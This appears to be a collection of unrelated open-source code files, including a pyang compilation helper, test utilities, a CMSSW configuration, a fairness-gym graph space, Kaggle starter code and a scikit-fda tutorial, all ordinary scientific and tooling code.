includes.append(session_dir)
depfile = os.path.join(session_dir, 'dependencies.xml')
else:
depfile = os.path.join(includes[0], 'dependencies.xml')
target_yangs = []
for yang_dir in includes:
for _file in glob.glob(os.path.join(yang_dir, '*.yang')):
target_yangs.append(_file)
if not target_yangs:
logging.debug('compile_pyimport: No yang file found !!')
return True, ET.Element('messages')
command = ['pyang', '-f', 'pyimport', '--plugindir', 'explorer/plugins', '-p']
command += [':'.join(includes)]
command += target_yangs
return Compiler.invoke_compile(command, depfile)
@staticmethod
def get_dependencies(username, modules, session):
"""
return dependencies for given yang models
"""
session_dir = ''
logging.debug("get_dependencies: Target Modules " + str(modules))
if session is not None:
session_dir = ServerSettings.session_path(session)
dfile = os.path.join(session_dir, 'dependencies.xml')
else:
dfile = os.path.join(ServerSettings.yang_path(username), 'dependencies.xml')
if not os.path.exists(dfile):
logging.error('get_dependencies: dependency file %s missing!!', dfile)
return []
if session_dir:
session_files = [os.path.basename(_file) for _file in glob.glob(os.path.join(session_dir, '*.yang'))]
yang_path = ServerSettings.yang_path(username)
yang_files = [os.path.basename(_file) for _file in glob.glob(os.path.join(yang_path, '*.yang'))]
dmodules = Set([])
dgraph = DYGraph(dfile)
for m in modules:
module = dgraph.dependency_module(m)
if module is None:
continue
for name in module.imports:
dmodules.add(name)
for name in module.includes:
dmodules.add(name)
for name in module.depends:
dmodules.add(name)
dmodules_list = list(dmodules)
deplist = []
for _file in dmodules_list:
# prefer freshly uploaded files
if session_dir:
depfile = _find_matching(_file, session_dir, session_files)
else:
depfile = _find_matching(_file, yang_path, yang_files)
if depfile is not None:
deplist.append(depfile)
else:
logging.warning("get_dependencies: Dependency (%s) not satisfied, compilation may fail !!" % _file)
logging.debug("get_dependencies: Computed " + str(deplist))
return deplist
@staticmethod
def invoke_compile(command, outfile, empty_callback=None):
"""
Invoke pyang compilation and return result
"""
logging.debug("invoke_compile: CMD: " + str(command))
p = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
rc = True
lines = []
if stderr:
lines = stderr.split('\n')
if p.returncode != 0:
logging.error('invoke_compile: Compile Errors: ' + str(lines))
if os.path.exists(outfile):
os.remove(outfile)
rc = False
elif stdout:
with open(outfile, 'w') as fd:
fd.write(stdout)
logging.debug('invoke_compile: %s -> done', outfile)
logging.debug('invoke_compile: Compile Warning: ' + str(lines))
else:
logging.warning('invoke_compile: empty pyang output !!')
if empty_callback is not None:
empty_callback(outfile)
messages = ET.Element('messages')
for line in lines:
msg = ET.Element('message')
msg.text = line
messages.append(msg)
return rc, messages
def _find_matching(target, directory, modules):
logging.debug('Searching target %s in %s' % (target, directory))
if not modules:
modules = [os.path.basename(_file) for _file in glob.glob(os.path.join(directory, '*.yang'))]
for module in modules:
if module == target + '.yang':
return os.path.join(directory, module)
if module.startswith(target + '@'):
return os.path.join(directory, module)
return None
|
model_card_toolkit/utils/testdata/testdata_utils.py | BrickFrog/model-card-toolkit | 267 | 12687825 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for reading pipelines in testdata."""
import os
import shutil
import ml_metadata as mlmd
from ml_metadata.proto import metadata_store_pb2
# constants in a mlmd metadata store instance derived from a tfx pipeline
_TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), 'tfx_oss_0_21')
_TFX_0_21_DB_FILE = 'metadata.sqlite'
_TFX_0_21_PAYLOAD_DIR = '/tmp/tfx-interactive-2020-03-24T21_31_20.888155-mny0kawj'
TFX_0_21_METRICS_ARTIFACT_IDS = (9, 11)
TFX_0_21_MODEL_ARTIFACT_ID = 8
TFX_0_21_MODEL_DATASET_ID = 2
TFX_0_21_MODEL_URI = os.path.join(_TEST_DATA_DIR, 'Trainer/model/6')
TFX_0_21_STATS_ARTIFACT_ID = 3
TFX_0_21_TRAINER_ID = 6
def get_tfx_pipeline_metadata_store(tmp_db_path: str) -> mlmd.MetadataStore:
"""Copies and opens a metadata_store from the testdata tfx pipeline db.
It migrates the db to the compatible schema at the head. In addition, it
updates the stored artifacts' uri to the test data db path, so that the test
code can open the testdata files mentioned in the database.
Args:
tmp_db_path: a temp path for copying the pipeline database.
Returns:
A ml-metadata store for the copied pipeline db.
"""
testdata_db_path = os.path.join(_TEST_DATA_DIR, _TFX_0_21_DB_FILE)
shutil.copyfile(testdata_db_path, tmp_db_path)
connection_config = metadata_store_pb2.ConnectionConfig(
sqlite=metadata_store_pb2.SqliteMetadataSourceConfig(
filename_uri=tmp_db_path,
connection_mode=metadata_store_pb2.SqliteMetadataSourceConfig
.READWRITE,
))
# The pipeline db is created with mlmd 0.21, the test run from the head
# may include newer mlmd schema versions. We migrate the db to newer
# mlmd schema if needed.
store = mlmd.MetadataStore(connection_config, enable_upgrade_migration=True)
# The pipeline db is generated with real pipelines in which the payloads of
# the artifacts are stored in the file system when the pipeline ran. We fix
# the uri to point to the testdata payloads generated by the pipeline.
fixed_artifacts = []
for artifact in store.get_artifacts():
artifact.uri = artifact.uri.replace(_TFX_0_21_PAYLOAD_DIR, _TEST_DATA_DIR)
fixed_artifacts.append(artifact)
store.put_artifacts(fixed_artifacts)
return store
|
test/test_ipython_magic.py | sandutsar/pyinstrument | 3,768 | 12687829 | from test.fake_time_util import fake_time
import pytest
# note: IPython should be imported within each test. Importing it in our tests
# seems to cause problems with subsequent tests.
cell_code = """
import time
def function_a():
function_b()
function_c()
def function_b():
function_d()
def function_c():
function_d()
def function_d():
function_e()
def function_e():
time.sleep(0.1)
function_a()
"""
# Tests #
@pytest.mark.ipythonmagic
def test_magics(ip):
from IPython.utils.io import capture_output as capture_ipython_output
with fake_time():
with capture_ipython_output() as captured:
ip.run_cell_magic("pyinstrument", line="", cell=cell_code)
assert len(captured.outputs) == 1
output = captured.outputs[0]
assert "text/html" in output.data
assert "text/plain" in output.data
assert "function_a" in output.data["text/html"]
assert "<iframe" in output.data["text/html"]
assert "function_a" in output.data["text/plain"]
assert "- 0.200 function_a" in output.data["text/plain"]
assert "- 0.100 sleep" in output.data["text/plain"]
with fake_time():
with capture_ipython_output() as captured:
# this works because function_a was defined in the previous cell
ip.run_line_magic("pyinstrument", line="function_a()")
assert len(captured.outputs) == 1
output = captured.outputs[0]
assert "function_a" in output.data["text/plain"]
assert "- 0.100 sleep" in output.data["text/plain"]
@pytest.mark.ipythonmagic
def test_magic_empty_line(ip):
# check empty line input
ip.run_line_magic("pyinstrument", line="")
# Utils #
@pytest.fixture(scope="module")
def session_ip():
from IPython.testing.globalipapp import start_ipython
yield start_ipython()
@pytest.fixture(scope="function")
def ip(session_ip):
session_ip.run_line_magic(magic_name="load_ext", line="pyinstrument")
yield session_ip
session_ip.run_line_magic(magic_name="reset", line="-f")
|
L1Trigger/DTTriggerPhase2/test/prod_Zmu_digis_segments_cfg.py | ckamtsikis/cmssw | 852 | 12687842 | import FWCore.ParameterSet.Config as cms
process = cms.Process("DigisSegments")
process.load("Geometry.CMSCommonData.cmsIdealGeometryXML_cff")
process.load("Geometry.DTGeometry.dtGeometry_cfi")
process.DTGeometryESModule.applyAlignment = False
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff")
process.GlobalTag.globaltag = "90X_dataRun2_Express_v2"
process.load("RecoLocalMuon.Configuration.RecoLocalMuon_cff")
## DT unpacker
process.load("EventFilter.DTRawToDigi.dtunpacker_cfi")
process.muonDTDigis.inputLabel = 'rawDataCollector'
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/90000/A8CD55CA-1F94-E611-8017-0CC47A7C35A8.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/90000/5E3D3C6E-6594-E611-AB43-0CC47A4D7616.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/FEB68681-5A87-E611-9374-FA163EBB015F.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F8A610D8-6287-E611-845E-FA163E57640C.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F80380BB-7687-E611-84D6-02163E01653D.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F4A6C6FD-B089-E611-9227-002590DE6E64.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F40149E2-7387-E611-B057-0025904CF766.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F21AA882-6C87-E611-8F39-FA163EA18210.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F0A05CAE-5387-E611-BACB-FA163E9FDE85.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F095A793-B389-E611-8A84-00259021A39E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/EE733CB6-B189-E611-A2A6-B499BAAC054A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/EA70D05E-4589-E611-BFE3-FA163E3F2846.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E46AF903-6C87-E611-8658-FA163EDB91EF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E4332BCB-D687-E611-A9EA-0025905A6126.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E09E85A0-EB86-E611-B17D-20CF3019DEEF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/DEEA9DDD-E187-E611-B13B-FA163E73AE79.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/DA12BA92-B087-E611-B7A3-0242AC130002.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D615D999-B189-E611-B46C-FA163E8E175A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D6055073-6E87-E611-8E91-FA163E8D8332.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D4FD5F54-658B-E611-BED9-0CC47A4D7646.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D029A3C8-4B89-E611-9D1F-FA163E631428.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/CE3E1EE9-9789-E611-998C-FA163ED21222.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/CCDC87DF-1A88-E611-9B2A-1CC1DE19274E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C8F8C3B2-5387-E611-B9FC-FA163E5669B0.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C4B49819-F286-E611-B127-549F358EB76F.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C2B91F86-5A87-E611-B7E7-02163E014C10.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C09B5970-4B88-E611-9C48-901B0E5427A6.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/BE837F4E-9E87-E611-8DC8-3417EBE7047A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/BAC10123-7787-E611-A0DE-02163E015FDF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B856E93F-E586-E611-BA74-FA163E1909D1.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B64FD56E-6E87-E611-BD9C-02163E016438.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B4BC5C81-6987-E611-B97A-F04DA275C2FB.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B43870D6-1A88-E611-A7C0-0026B9F8CC18.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AE723C49-B287-E611-ACE5-0CC47A78A42E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AC213957-658B-E611-A7AF-0025905B8612.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AA51B3CF-4B89-E611-A41A-02163E013C40.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A8FF1F89-E586-E611-BC37-FA163E08C002.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A28F9FFD-B489-E611-B864-008CFAFBF132.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A21B22EA-8888-E611-B0C4-0CC47A4DEEBA.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A0C3ADD4-0E87-E611-892F-02163E014D8C.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9EE91F3C-1B87-E611-878C-FA163E775232.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9CAF60BB-4489-E611-A29C-FA163EEF018D.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9AAB70FE-D587-E611-834C-FA163ECD5C62.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9A522CDD-6287-E611-BA23-FA163E3DAA96.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9A345235-E586-E611-9CE6-FA163EFA00C3.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/98CD93AB-3A88-E611-A4C8-B083FED04276.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/961767D1-B189-E611-A1A3-20CF305B05AE.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/90AAF1A6-5387-E611-B9B8-0025905C3DF6.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/90522755-9587-E611-A29C-C45444922BB0.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/901352B9-B189-E611-89EC-0CC47A6C183A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8E949801-8288-E611-B9D6-047D7BD6DF22.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/88ADAECF-5789-E611-81B2-FA163EDB91EF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8823F019-8587-E611-A162-00259073E3EA.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/80CD4397-2A88-E611-9639-20474791CCC4.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8095FC8B-B389-E611-ADD9-7CD30AB7F868.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/767A38E6-6287-E611-B225-02163E015D84.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/744FC7C0-5387-E611-BA6F-FA163E06DFEA.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6CFB58E7-1587-E611-BD35-FA163EC97E57.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68DE47B4-7E88-E611-A6AE-001E67792422.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68A0DCD5-BB87-E611-8BF3-008CFA0F5040.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68171F81-6187-E611-A9DF-001E67504F1D.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/66421E3C-5489-E611-B0BE-001E67505A2D.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/64FB46E3-8887-E611-AAAA-FA163EFA220C.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/64CC5933-4088-E611-B8DD-0025904C641E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6448920B-7D87-E611-A5EA-02163E017614.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6297FABA-5789-E611-A918-0CC47AC08BF8.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5C7F15A9-9A88-E611-A80B-FA163EC5FCBC.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5A63963D-B887-E611-88DC-001E6739C801.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5404AF86-6187-E611-8DB3-44A84225CDA4.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/509458EF-B189-E611-9F85-FA163E17EB18.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/4C3B6518-B189-E611-93B3-0025905A612A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/48E6AB0F-F286-E611-9792-FA163EDB91EF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/40E2E2DE-8887-E611-9531-FA163E2AAF83.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/38FF87C2-B189-E611-B665-0CC47A1DF7FA.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/38CE04DC-5788-E611-9240-848F69FD2853.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/32775AB1-6C87-E611-A388-02163E0165D4.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/30A4019E-FE86-E611-B70E-02163E0165B6.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/2C6B53B6-5387-E611-9582-FA163E75F411.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/26D33DC4-3889-E611-B1AF-FA163E743F0B.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/26181B1F-6387-E611-AC9E-02163E01304E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/24A815DC-0E87-E611-8D96-B083FED13C9E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/22256107-6887-E611-847F-002590DE6E86.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/20263DED-9B88-E611-9630-001E67F336E0.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/1EF43C44-DE87-E611-BB70-6C3BE5B5B340.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/128426B7-8988-E611-BB9C-008CFA0A5A10.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/1041B010-6F87-E611-BA26-02163E015FDB.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0E90E9AF-5387-E611-9FFA-FA163EC80D44.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C894F1B-5289-E611-8381-0025904C5DE0.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C6DFDD5-4D87-E611-9CF3-FA163E0B7F2E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C153439-B187-E611-96D9-002590E1E9B8.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/083DFA38-B189-E611-BD7C-A0369F7FC770.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/02A6971D-F286-E611-8364-002590DE6E32.root"
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
process.out = cms.OutputModule("PoolOutputModule",
outputCommands = cms.untracked.vstring('drop *','keep *_muonDTDigis_*_*','keep *_dt4DSegments_*_*'),
fileName = cms.untracked.string('/store/user/carrillo/digis_segments_Run2016BSingleMuonRAW-RECO.root')
)
process.p = cms.Path(process.muonDTDigis*process.dtlocalreco)
process.this_is_the_end = cms.EndPath(process.out)
|
robosuite/models/__init__.py | kyungjaelee/robosuite | 397 | 12687857 | import os
from .world import MujocoWorldBase
assets_root = os.path.join(os.path.dirname(__file__), "assets")
|
spaces/graph.py | JaniAnttonenp/ml-fairness | 268 | 12687869 | # coding=utf-8
# Copyright 2020 The ML Fairness Gym Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Graph spaces for the ML fairness gym."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Any
import gym
import networkx as nx
class GraphSpace(gym.Space):
"""The space of random NetworkX graphs with a given number of nodes.
Graphs sampled from this space are drawn from the Erdos-Renyi random graph
model where each pair of nodes shares an edge with probability p.
Graphs can be directed or undirected.
Two graph spaces are considered equivalent if they have the same number of
nodes, the same edge probability, and the same directedness.
"""
def __init__(self, num_nodes, directed = False, p = 0.05):
"""Initialize a GraphSpace instance.
Args:
num_nodes: A positive integer indicating the number of nodes of graphs
that are contained in this space.
directed: A boolean indicating whether this space contains directed or
undirected graphs.
p: A float in [0, 1] that gives the probability that any two nodes are
connected by an edge in graphs that are sampled from this space.
"""
self.num_nodes = num_nodes
self.directed = directed
self.p = p
def contains(self, item):
return (isinstance(item, nx.Graph)
and item.number_of_nodes() == self.num_nodes)
def sample(self):
return nx.fast_gnp_random_graph(
self.num_nodes, self.p, directed=self.directed)
def __repr__(self):
return 'Graph (%d, %.4f, %s)' % (
self.num_nodes, self.p, self.directed)
def __eq__(self, other):
return (
isinstance(other, self.__class__)
and self.num_nodes == other.num_nodes
and self.p == other.p
and self.directed == other.directed)
|
Logistic-Regression/classifier_corrected.py | joao-r-santos/DataSciencePython | 5,070 | 12687873 | <reponame>joao-r-santos/DataSciencePython
#https://www.kaggle.com/c/amazon-employee-access-challenge/forums/t/4797/starter-code-in-python-with-scikit-learn-auc-885
""" Amazon Access Challenge Starter Code
These files provide some starter code using
the scikit-learn library. It provides some examples on how
to design a simple algorithm, including pre-processing,
training a logistic regression classifier on the data,
assess its performance through cross-validation and some
pointers on where to go next.
<NAME> <<EMAIL>>
"""
from __future__ import division
import numpy as np
from sklearn import (metrics, cross_validation, linear_model, preprocessing)
SEED = 42 # always use a seed for randomized procedures
def load_data(filename, use_labels=True):
"""
Load data from CSV files and return them as numpy arrays
The use_labels parameter indicates whether one should
read the first column (containing class labels). If false,
return all 0s.
"""
# load column 1 to 8 (ignore last one)
data = np.loadtxt(open("data/" + filename), delimiter=',',
usecols=range(1, 9), skiprows=1)
if use_labels:
labels = np.loadtxt(open("data/" + filename), delimiter=',',
usecols=[0], skiprows=1)
else:
labels = np.zeros(data.shape[0])
return labels, data
def save_results(predictions, filename):
"""Given a vector of predictions, save results in CSV format."""
with open(filename, 'w') as f:
f.write("id,ACTION\n")
for i, pred in enumerate(predictions):
f.write("%d,%f\n" % (i + 1, pred))
def main():
"""
Fit models and make predictions.
We'll use one-hot encoding to transform our categorical features
into binary features.
y and X will be numpy array objects.
"""
model = linear_model.LogisticRegression(C=3) # the classifier we'll use
# === load data in memory === #
print "loading data"
y, X = load_data('train.csv')
y_test, X_test = load_data('test.csv', use_labels=False)
# === one-hot encoding === #
# we want to encode the category IDs encountered both in
# the training and the test set, so we fit the encoder on both
encoder = preprocessing.OneHotEncoder()
encoder.fit(np.vstack((X, X_test)))
X = encoder.transform(X) # Returns a sparse matrix (see numpy.sparse)
X_test = encoder.transform(X_test)
# if you want to create new features, you'll need to compute them
# before the encoding, and append them to your dataset after
# === training & metrics === #
mean_auc = 0.0
n = 10 # repeat the CV procedure 10 times to get more precise results
for i in range(n):
# for each iteration, randomly hold out 20% of the data as CV set
X_train, X_cv, y_train, y_cv = cross_validation.train_test_split(
X, y, test_size=.20, random_state=i*SEED)
# if you want to perform feature selection / hyperparameter
# optimization, this is where you want to do it
# train model and make predictions
model.fit(X_train, y_train)
preds = model.predict_proba(X_cv)[:, 1]
# compute AUC metric for this CV fold
fpr, tpr, thresholds = metrics.roc_curve(y_cv, preds)
roc_auc = metrics.auc(fpr, tpr)
print "AUC (fold %d/%d): %f" % (i + 1, n, roc_auc)
mean_auc += roc_auc
print "Mean AUC: %f" % (mean_auc/n)
# === Predictions === #
# When making predictions, retrain the model on the whole training set
model.fit(X, y)
preds = model.predict_proba(X_test)[:, 1]
filename = raw_input("Enter name for submission file: ")
save_results(preds, filename + ".csv")
if __name__ == '__main__':
main()
|
atlas/foundations_authentication/src/foundations_authentication/user_token.py | DeepLearnI/atlas | 296 | 12687875 |
def user_token():
from foundations_contrib.utils import foundations_home
from os.path import expanduser, join
import yaml
import os
token = os.getenv('FOUNDATIONS_TOKEN', None)
if not token:
credential_filepath = expanduser(join(foundations_home(), "credentials.yaml"))
if not os.path.isfile(credential_filepath):
return None
with open(credential_filepath, "r") as file:
credential_dict = yaml.load(file, Loader=yaml.FullLoader)
if "default" not in credential_dict:
return None
if "token" not in credential_dict["default"]:
return None
token = credential_dict["default"]["token"]
return token |
examples/plot_representation.py | jiduque/scikit-fda | 147 | 12687900 | """
Representation of functional data
=================================
Explores the different representations of functional data.
"""
# Author: <NAME>
# License: MIT
import skfda
from skfda.representation.interpolation import SplineInterpolation
import skfda.representation.basis as basis
##############################################################################
# In this example we are going to show the different representations of
# functional data available in scikit-fda.
#
# First we are going to fetch a functional data dataset, such as the Berkeley
# Growth Study. This dataset correspond to the height of several boys and
# girls measured until the 18 years of age. The number and times of the
# measurements are the same for each individual.
dataset = skfda.datasets.fetch_growth()
fd = dataset['data']
y = dataset['target']
print(repr(fd))
fd.plot(group=y, group_colors=['red', 'blue'])
##############################################################################
# This kind of representation is a discretized representation, in which the
# measurement points are shared between samples.
print(fd.grid_points)
##############################################################################
# In this representation, the data can be arranged as a matrix.
print(fd.data_matrix)
##############################################################################
# By default, the data points are interpolated using a linear interpolation,
# but this is configurable.
dataset = skfda.datasets.fetch_medflies()
fd = dataset['data']
first_curve = fd[0]
first_curve.plot()
##############################################################################
# The interpolation used can however be changed. Here, we will use an
# interpolation with degree 3 splines.
first_curve.interpolation = SplineInterpolation(3)
first_curve.plot()
##############################################################################
# This representation allows also functions with arbitrary dimensions of the
# domain and codomain.
fd = skfda.datasets.make_multimodal_samples(n_samples=1, dim_domain=2,
dim_codomain=2)
print(fd.dim_domain)
print(fd.dim_codomain)
fd.plot()
##############################################################################
# Another possible representation is a decomposition in a basis of functions.
# $$
# f(t) = \\sum_{i=1}^N a_i \\phi_i(t)
# $$
# It is possible to transform between both representations. Let us use again
# the Berkeley Growth dataset.
dataset = skfda.datasets.fetch_growth()
fd = dataset['data']
y = dataset['target']
fd.plot()
##############################################################################
# We will represent it using a basis of B-splines.
fd_basis = fd.to_basis(basis.BSpline(n_basis=4))
fd_basis.plot()
##############################################################################
# We can increase the number of elements in the basis to try to reproduce the
# original data with more fidelity.
fd_basis_big = fd.to_basis(basis.BSpline(n_basis=7))
fd_basis_big.plot()
#############################################################################
# Lets compare the diferent representations in the same plot, for the same
# curve
fig = fd[0].plot()
fd_basis[0].plot(fig=fig)
fd_basis_big[0].plot(fig=fig)
fig.axes[0].legend(['Original', '4 elements', '7 elements'])
##############################################################################
# We can also see the effect of changing the basis.
# For example, in the Fourier basis the functions start and end at the same
# points if the period is equal to the domain range, so this basis is clearly
# non suitable for the Growth dataset.
fd_basis = fd.to_basis(basis.Fourier(n_basis=7))
fd_basis.plot()
##############################################################################
# The data is now represented as the coefficients in the basis expansion.
print(fd_basis)
|
model-optimizer/extensions/front/ChangePlaceholderTypes.py | monroid/openvino | 2,406 | 12687905 | <reponame>monroid/openvino
